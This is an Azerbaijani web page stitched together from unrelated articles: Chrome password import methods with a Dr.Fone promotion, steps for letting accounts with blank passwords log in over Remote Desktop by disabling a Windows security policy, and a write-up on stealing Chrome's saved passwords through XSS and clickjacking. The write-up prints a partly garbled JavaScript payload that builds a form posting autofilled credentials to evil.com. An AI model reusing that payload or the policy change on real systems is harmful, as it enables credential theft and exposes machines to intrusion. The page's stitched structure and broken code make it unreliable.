Uzaq masaüstündən daxil olmaq üçün parolu necə söndürmək olar (7 addımda)

Addım 4: İndi, açılan menyuda “Şifrələri ixrac et” seçiminə sağ vurun, “Yoxlama” üzərinə klikləyin. Brauzer pəncərəsinin sağ tərəfində bir panel görəcəksiniz.

Parollarınızı Chrome və Google Parol Menecerinə necə idxal etmək olar

Çoxumuz gündəlik olaraq Gmail, Google Axtarış, Google Xəritələr kimi bir neçə Google xidmətindən istifadə edirik. Biz də Google hesablarımızdan istifadə edərək bunlara daxil oluruq. Beləliklə, prosesi asanlaşdırmaq üçün Google-a parollarımızı idarə etməsinə icazə vermək ağlabatan səslənir.

Asanlıqla daxil olmaq üçün siz müxtəlif parollarınızı təhlükəsiz saxlamağa imkan verən əsas parol meneceri kimi Google Chrome-dan istifadə edirsiniz. Bununla belə, əksər digər brauzerlər kimi, Chrome parolları cədvəl formatında ixrac etməyə icazə vermir.

CSV-dən istifadə edərək idxal etmək fərqli bir top oyunudur, çünki Chrome-un CSV xüsusiyyəti çox erkən mərhələdədir. Beləliklə, onu əl ilə aktivləşdirməli olacaqsınız.

Bu məqalə parolları CSV faylı ilə Google Chrome-a necə idxal edə biləcəyinizi müzakirə edəcək.

• Metod 1: Parolun İdxal Bayraqını aktivləşdirin
• Metod 2: CSV Parolunun Əmr İstemi (Cmd) və ya Terminal vasitəsilə idxalını aktivləşdirin
• Metod 3: İdxal Seçimini Gizlətmək üçün DevTools istifadə edin
• Metod 4: Şifrənizi Dr.Fone – Password Manager ilə bərpa edin

Metod 1: Parolun İdxal Bayraqını aktivləşdirin

Beləliklə, ehtiyat CSV-dən istifadə edərək saxlanmış parollarınızı Google Chrome-a idxal etməyin ən asan yolu, eksperimental xüsusiyyətləri aktivləşdirməyə və ya söndürməyə imkan verən brauzerinizin Avtomatik Doldurma parametrlərini dəyişdirməkdir.

Addım 1: İlk öncə Chrome brauzerinizi açmalı və ünvan çubuğuna chrome://flags/#password-import-export yazmalısınız. “Enter” düyməsini basın və Chrome-un bayraqlar səhifəsi görünəcək. Xüsusiyyəti aktivləşdirmək üçün aşağıdakı addımları yerinə yetirin:

Addım 2: İndi, açılan menyudan “Enable” seçimini seçəcəksiniz. Sonra Chrome brauzeri yenidən işə salmağı xahiş edəcək. Brauzeri yenidən başlatmaq üçün “İndi yenidən başladın” seçimini seçin.

Addım 3: Sonra, yazaraq Chrome-un parol menecerinə keçin

chrome://settings/passwords və ya onun “Parametrlər” menyusuna keçin və Qabaqcıl Parametrlərdən “Parolları idarə et” seçimini seçin.

Addım 4: Burada parol siyahılarınızı ixrac etmək üçün “İxrac et” seçiminə klikləmək tələb olunur. Sonra sizdən istifadəçi hesabı parolunuzu pop-up vasitəsilə daxil etməyiniz xahiş olunacaq. Şifrənizi daxil etdikdən sonra “Saxla” pəncərəsi açılacaq.

Addım 5: Parollarınızın siyahısı brauzerdə sadə “Mətn Csv” faylı kimi saxlanacaq, buradan bütün parolları “Csv” idxalını dəstəkləyən parol menecerinizə idxal edə bilərsiniz.

Addım 6: Əgər parolları idxal etmək istəyirsinizsə, sadəcə olaraq “İdxal” seçimini seçin. Bu, parollarınızı ixrac etməkdən fərqlidir, çünki burada Chrome sizdən hesab parolunu təqdim etməyi tələb etməyəcək. Siz sadəcə parolunuzla “Csv” faylını açmalısınız və Chrome qarşıdakı işi görəcək.

Metod 2: CSV Parolunun Əmr İstemi (Cmd) və ya Terminal vasitəsilə idxalını aktivləşdirin

Chrome-da idxal seçimini aktivləşdirən əmrdən istifadə parolların siyahısını idxal etməyə imkan verir.

İndi üsul Windows və Mac əməliyyat sistemlərində fərqli işləyir. Gəlin onların hər ikisini müzakirə edək.

Komanda əmri ilə Windows-da parolların idxalı

Addım 1: “Başlat” menyusuna gedin və Əmr əmrini axtarın (və ya “cmd” yazın) və üzərinə klikləyin.

Addım 2: İndi, əmr satırı pəncərəsində aşağıda verilmiş əmri daxil edin və davam etmək üçün Enter düyməsini basın. Sonra, Chrome-un icra olunan faylı kompüterinizdə açılacaq.

cd “C:\Proqram Faylları (x86)\Google\Chrome\Application”

Addım 3: Sonra, aşağıda verilmiş başqa bir əmr yazın və Enter düyməsini basın. Gizli parol idxalı funksiyası Chrome-da aktivləşdiriləcək. İndi Chrome avtomatik işə salınacaq.

chrome.exe -enable-features=Şifrə İdxal

Addım 4: Sonra, yuxarı sağ küncdəki üç nöqtəyə klikləməklə “Parametrlər”ə keçməli olacaqsınız. Sonra, “Parollar” seçiminə klikləyin.

Addım 5: “Saxlanılan Parollar” seçimi altında, “İdxal” seçimini əldə etmək üçün üç şaquli nöqtəyə klikləyin. Parollarınızı Chrome-a idxal etmək üçün bu seçimə klikləyin.

MacOS-da parolları Chrome-a idxal edin

Addım 1: Dock-dan “Launchpad” seçin və “Terminal” yazın və üzərinə klikləyin (Alternativ olaraq “Finder>Go>Utilities>Terminal-a keçin).

Addım 2: Aşağıdakı əmri Terminalda yazın və “Enter” düyməsini basın. Sonra, Chrome avtomatik olaraq açılacaq.

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome -enable-features=Şifrə İdxal

Addım 3: Sonra, Chrome-da yuxarı sağ küncdən üç şaquli nöqtəni seçin. “Parametrlər” və sonra “Parollar” seçiminə klikləyin.

Addım 4: “Saxlanılan Parollar” seçiminin sağında, üç şaquli nöqtə işarəsini seçin və sonra CSV faylını seçin və idxal edin.

Metod 3: İdxal Seçimini Gizlətmək üçün DevTools istifadə edin

Ümumiyyətlə, veb tərtibatçıları Command Prompt və ya Terminal əvəzinə bu üsula üstünlük verirlər. Bunun necə işlədiyini öyrənək:

Addım 1: Google Chrome brauzerinə gedin və yuxarı sağ küncdəki üç şaquli nöqtə seçimindən “Parametrlər” seçimini seçin.

Addım 2: Sonra, “Avtomatik doldurma” bölməsində “Parollar” seçiminə klikləyin.

Addım 3: “Saxlanılan Parollar” bölməsinin sağ tərəfindəki üç şaquli nöqtə işarəsinə klikləyin.

Addım 4: İndi, açılan menyuda “Şifrələri ixrac et” seçiminə sağ vurun, “Yoxlama” üzərinə klikləyin. Brauzer pəncərəsinin sağ tərəfində bir panel görəcəksiniz.

Addım 5: Burada avtomatik olaraq vurğulanan hissənin bir qədər yuxarısında olan “gizli” sözünü iki dəfə vurmalısınız.

Addım 6: Sonra klaviaturadan “Sil” düyməsini basın və “Enter” düyməsini basın.

Addım 7: İndi bir müddət Google Chrome interfeysinə baxın. “Saxlanılan parollar” bölməsinin ən sağında yerləşən üç şaquli nöqtə işarəsini seçin.

Addım 8: “İdxal” seçimini tapacaqsınız. Onu seçin və sonra yükləmək istədiyiniz CSV faylını seçin.

Addım 9: Təsdiq etmək üçün “Açıq” seçimini seçin.

Qeyd: Sildiyiniz “gizli” sözü müvəqqəti dəyişiklikdir və gələcəkdə eyni üsulu təkrarlasanız, “gizli” ifadəsi yenidən görünəcək. Beləliklə, parolları CSV faylı vasitəsilə idxal etmək istədiyiniz zaman onu silməli olacaqsınız.

Metod 4: Şifrənizi Dr.Fone – Password Manager ilə bərpa edin

Bir neçə ildən sonra parolunuzu idarə etmək daha da çətinləşəcək. Həmişə internetdə oturub parollarınızı bərpa etmək üsullarını axtara bilməyən birisinizsə, sındırılması çətin olan parollar yaratmağa və onları asanlıqla idarə etməyə imkan verən tək girişli parol menecerinə ehtiyacınız var.

Wondershare-in Dr.Fone proqramı Android, iOS, Mac OS və ya Windows sistemlərində işləməsindən asılı olmayaraq cihazlarınız üçün geniş çeşidli həllər təklif edən hərtərəfli proqramdır.

Dr.Fone alət dəsti məlumatların bərpasına, WhatsApp transferinə və daha çox şeyə köçürmələrin ehtiyat nüsxəsini çıxarmağa imkan verir. Bununla belə, o, yalnız iOS cihazında parollarınızı idarə etməyə imkan verir. Beləliklə, cihazınız hər hansı digər əməliyyat sistemində işləyirsə, yuxarıda qeyd olunan üsullara əməl edin.

İndi Dr.Fone – Password Manager (iOS) unudulmuş parollarınızı iOS cihazınızda bir neçə kliklə idxal etməyə necə kömək edə biləcəyini addım-addım müzakirə edək .

Addım 1: İşıqlandırma kabelindən istifadə edərək iOS cihazınızı Dr.Fone artıq yüklənmiş və quraşdırılmış kompüterə birləşdirməklə başlayın. Kompüterinizdə Dr.Fone-u işə salın və ekranda “Ekran Kilidini Açma” seçimini seçin.

Qeyd: iOS cihazınızı kompüterə ilk dəfə qoşarkən siz iDevice-də “Güvən” düyməsini seçməli olacaqsınız. Kilidi açmaq üçün parol daxil etməyiniz xahiş olunursa, uğurla qoşulmaq üçün düzgün parolu daxil edin.

Addım 2: İndi, ekranda “Start Scan” seçimi seçin və Dr.Fone cihaz sizin hesab parol aşkar edək.

Arxaya oturun və Dr.Fone iDevice-in təhlili bitənə qədər gözləyin. Lütfən, skan prosesi davam edərkən əlaqəni kəsməyin.

Addım 3: iDevice cihazınız hərtərəfli skan edildikdən sonra Wi-Fi parolu, poçt hesabı parolu, ekran vaxtı parolu, Apple ID parolu daxil olmaqla bütün parol məlumatları ekranınızda görünəcək.

Addım 4: Sonra, sağ alt küncdəki “İxrac” seçimini seçin və 1Password, Chrome, Dashlane, LastPass, Keeper və s. üçün parolu ixrac etmək üçün CSV formatını seçin.

Nəticə:

Hər hansı bir brauzerə giriş məlumatını idxal etmək köhnəlmiş bir üsuldur, lakin Google Chrome ilə başqa seçiminiz yoxdur. Ancaq bu məqalədə qeyd olunan kodlaşdırma prosedurları haqqında çox sadə bir anlayışınız olsa belə, parolları bir neçə dəqiqə ərzində asanlıqla idxal edə bilərsiniz.

Bütün saxlanmış parollarınıza malik CSV faylınız olduqda, onları asanlıqla Chrome brauzerinizə idxal edə və bütün hesablarınıza və vebsaytlarınıza rahatlıqla daxil ola bilərsiniz.

Ümid edirəm ki, bu məqalə saxlanmış parollarınızı Chrome-da necə ötürəcəyinizi anlamağa kömək etdi. Həmçinin, Dr.Fone-un köməyi ilə siz asanlıqla eyni şeyi edə və itirilmiş məlumatlarınızı bərpa etmək üçün də istifadə edə bilərsiniz.

Bu siyahıya əlavə edilən hər hansı metodu qaçırdığımı düşünürsünüzsə, zəhmət olmasa aşağıdakı şərh bölməsində bu barədə bizə məlumat verin.

Uzaq masaüstündən daxil olmaq üçün parolu necə söndürmək olar (7 addımda)

Uzaq masa üstü, başqa bir kompüterdən konsola giriş təmin etmək üçün Windows kompüterlərində istifadə olunur. Varsayılan olaraq, parol olmayan hesab istifadəçiləri təhlükəsizlik səbəbindən Uzaq Masaüstü istifadə edərək giriş edə bilməyəcəklər. Parametrləri dəyişdirməyə imkan verən və parolu olmayan istifadəçilərin uzaq masaüstünə daxil olmasına imkan verən bir yerli qrup qaydası var.

Addım 1

“Başlat” və sonra “Çalıştır” düyməsini basın. Qutuya “gpedit.msc” yazın və sonra “Tamam” düyməsini basın.

Addım 2

“Kompüter Ayarları” başlığı altında “Windows Ayarları” pəncərəsini vurun.

Addım 3

Bölümü genişləndirmək üçün “Təhlükəsizlik Ayarları” oxunu vurun.

Addım 4

Bölümü genişləndirmək üçün “Yerli Siyasətlər” oxunu vurun.

Addım 5

Sağ tərəfdəki bütün seçimləri göstərmək üçün “Təhlükəsizlik Seçimləri” başlığını vurun.

Addım 6

“Hesablar; yalnız konsol giriş üçün boş parollarla yerli hesabların istifadəsini məhdudlaşdırın.” Cüt vurun.

Addım 7

“Əlil” seçimini seçin və dəyişiklikləri saxlamaq üçün Tamam düyməsini basın.

XSS istifadə edərək Chrome-un saxlanmış parolunu necə oğurlamaq olar?

Bu yazıda, ClickJacking ilə birlikdə XSS hücumundan istifadə edərək hakerlərin brauzerdə saxlanan parolları necə oğurlaya biləcəyi barədə danışacağıq.

Hamınıza salam, əziz dostlar!

Bu yazıda, ClickJacking ilə birlikdə XSS hücumundan istifadə edərək hakerlərin brauzerdə saxlanan parolları necə oğurlaya biləcəyi barədə danışacağıq.

Yeri gəlmişkən, XSS ən populyar veb zəifliklərindən biridir. Düzünü desək, bu, zəiflik deyil, hücumdur, lakin gəlin razılaşaq ki, bəzən XSS dedikdə XSS hücumuna imkan verən zəifliyi nəzərdə tuturuq.

Vikipediyaya görə, XSS (Saytlararası Skript) “web sistemi tərəfindən buraxılan səhifəyə zərərli kodun daxil edilməsindən ibarət olan veb sistemlərinə hücum növüdür (bu, istifadəçi bu səhifəni açdıqda kompüterində həyata keçiriləcək) və bu kodun təcavüzkarın veb serveri ilə qarşılıqlı əlaqəsi.”

Hücumun mahiyyəti

Sayt istifadəçisinə hücum etmək üçün o, xüsusi yaradılmış linki izləməyə məcbur edilməlidir (kanalımızda bunu etməyə imkan verən sosial mühəndislik üsulları haqqında artıq yazmışıq). Xüsusi keçid tələb edən hücum ReflectedXSS adlanır. Zərərli kodun səhifədə saxlandığı StoredXSS də var, buna görə də qurbanı linki izləməyə məcbur etmək lazım deyil, sadəcə kimsə yoluxmuş səhifəni açana qədər gözləyin.

• Tutaq ki, sosial mühəndislik nəticəsində istifadəçi aşağıdakı linkə klik etdi:

İlk baxışdan o qədər də şübhə doğurmur: uzundur, amma domen düzgündür və orijinal sayt açılır ki, bu da elə görünə bilər ki, qorxulu heç nə yoxdur (spoiler: parolları internet səhifəsində saxlamayanlar). brauzer həqiqətən hücumdan qorxmur). Lakin linkə tıkladığınız zaman URL-də kodlanmış zərərli kod işə salınır. Skript, qurbanın REG.RU şəxsi hesabından brauzerdə saxlanan giriş/parol birləşməsini oğurlayır.

• Linki izləyən istifadəçinin gözü ilə belə görünür – səhifədə səhv bildirişi görünür (şübhə doğurmamaq üçün məqsədyönlü olaraq bəzi standart mesajları göstəririk):

OK düyməsini sıxdıqda saytın əsas səhifəsi açılacaq. Ümumiyyətlə, hamısı budur. Qəribə, lakin şübhəli deyil. Bu anda hakerin brauzerdə saxlanmış parolu artıq qəbul etdiyini başa düşmək demək olar ki, mümkün deyil.

İndi gəlin bu hücumun əslində necə işlədiyini görək.

Texniki detallar

• Gəlin görək linkdə nə gizlənir. Bunu etmək üçün onu deşifrə edirik:

• Linkə kliklədiyiniz zaman JavaScript yüklənir və icra olunur:

var p = document.createElement("input"); p.setAttribute("type", "password"); p.setAttribute("name", "password"); var l = document.createElement("input"); l.setAttribute("type", "text"); l.setAttribute("name", "login"); var f = document.createElement("form"); f.setAttribute("method", "post"); f.setAttribute("action", "https://evil.com/"); f.appendChild(l); f.appendChild(p); document.body.appendChild(f) function clck() , 1000)> document.body.setAttribute('onclick', 'clck()'); setTimeout(()=>,2000)

Bu kod səhifədə giriş formasına uyğun adlarla forma və sahələr yaradır ki, brauzer yadda saxlanmış parolu harada əvəz edəcəyini bilsin. Forma aşağıya əlavə olunur:

Brauzerin (sınaqda Chrome istifadə edilib) parolu əvəz etməsi üçün istifadəçinin səhifə ilə qarşılıqlı əlaqəsi tələb olunur. JS istifadə edərək bir klik simulyasiyası işləməyəcək, sizə real klik lazımdır. Bunun üçün biz qurbanı instinktiv olaraq səhv mesajındakı OK düyməsini sıxmağa təhrik edirik. İstifadəçini müəyyən yerə klik etməyə məcbur etmək ClickJacking adlı hücumun mahiyyətini təşkil edir. Hər şeyin yüklənməsinə və işləməsinə vaxt tapması üçün lazımi fasilələri göstəririk. Body onclick idarəedicisini asırıq.

İlk klikdən sonra parol hakerin saytına göndərilir, burada yalnız onu yazmaq, müştəri isə yönləndirməni əsas səhifəyə qaytarmaq üçün qalır.

• Beləliklə, orta istifadəçi özünü bu xüsusi hücumdan necə qoruya bilər?
• Cavab sadədir: parolları brauzerdə saxlamağa ehtiyac yoxdur. Həmkarlarımıza KeePass və ya KeePassXC kimi parol menecerlərindən istifadə etməyi tövsiyə edirik.

Nəticələr

Bu hücum XSS hücumlarının sosial mühəndislik ilə birlikdə nə qədər təhlükəli ola biləcəyini açıq şəkildə nümayiş etdirir. Bu cür zəifliklərdən istifadə variantları yalnız javascript imkanları və hakerin təxəyyülü ilə məhdudlaşır.

KeePassXC uzadılması hücumun uğurlu olma ehtimalını azaldır, lakin onu tamamilə aradan qaldırmır. Hər halda, parolları brauzerdə saxlamaqdan daha təhlükəsizdir.